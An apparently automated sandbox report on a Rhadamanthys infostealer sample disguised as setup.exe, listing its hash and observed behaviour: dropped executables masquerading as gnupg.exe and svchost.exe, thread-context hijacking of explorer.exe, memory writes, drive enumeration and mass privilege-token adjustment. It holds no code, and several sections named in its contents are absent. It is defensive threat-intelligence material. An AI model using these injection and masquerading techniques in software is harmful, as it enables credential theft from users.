Malware Analysis Report

2025-06-15 19:48

Sample ID 240209-vtts9adb5v
Target setup.exe
SHA256 6ac07ce849ad258cf9b47ca9767badc6ee867962cdcbe470cbe0d02ddb7437e8
Tags
rhadamanthys stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6ac07ce849ad258cf9b47ca9767badc6ee867962cdcbe470cbe0d02ddb7437e8

Threat Level: Known bad

The file setup.exe was found to be: Known bad.

Malicious Activity Summary

rhadamanthys stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Rhadamanthys

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Program crash

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-09 17:17

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-09 17:17

Reported

2024-02-09 17:47

Platform

win11-20231215-en

Max time kernel

939s

Max time network

1168s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3940 created 2824 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\system32\sihost.exe

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aPee1yKEMUOBcG5\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\D: C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3164 set thread context of 3940 N/A C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe C:\Windows\SysWOW64\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIAEEF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAF40.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICC6E.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFD6AC3EC2F0BB8290.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File created C:\Windows\Installer\e57acf9.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAE22.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{32889C47-8C9B-4281-A3AD-9D1BCBCC1C09} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57acfd.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFB03D393F9EA60AD8.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57acf9.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFE05CB3B5DCC967EF.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFB6A9AC84057EB145.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAECF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAF00.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAF20.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID25B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setupact.log C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\System32\oobe\UserOOBEBroker.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133519726848393191" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2496 wrote to memory of 3304 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2496 wrote to memory of 3304 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2496 wrote to memory of 3304 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
